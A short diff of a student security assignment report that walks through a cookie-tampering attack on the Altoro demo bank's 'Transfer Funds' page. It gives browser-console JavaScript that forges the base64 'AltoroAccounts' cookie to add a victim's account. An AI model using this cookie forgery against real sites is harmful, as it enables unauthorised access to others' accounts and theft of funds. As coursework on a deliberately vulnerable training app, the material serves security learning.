Brikaa/security-assignment-2/report/report.md

 ![My Account > Transfer Funds](images/image-24.png)

-- Run the following javascript code in the browser console while on the page (F12 > console):
+- Run the following javascript code in the browser console while on the page (F12 > console) to add the victim's account to your `AltoroAccounts` cookie:

   ```javascript
   evilCookie = btoa('800000~evil~101|800004~Savings~101');
   document.cookie = `AltoroAccounts=${evilCookie}`;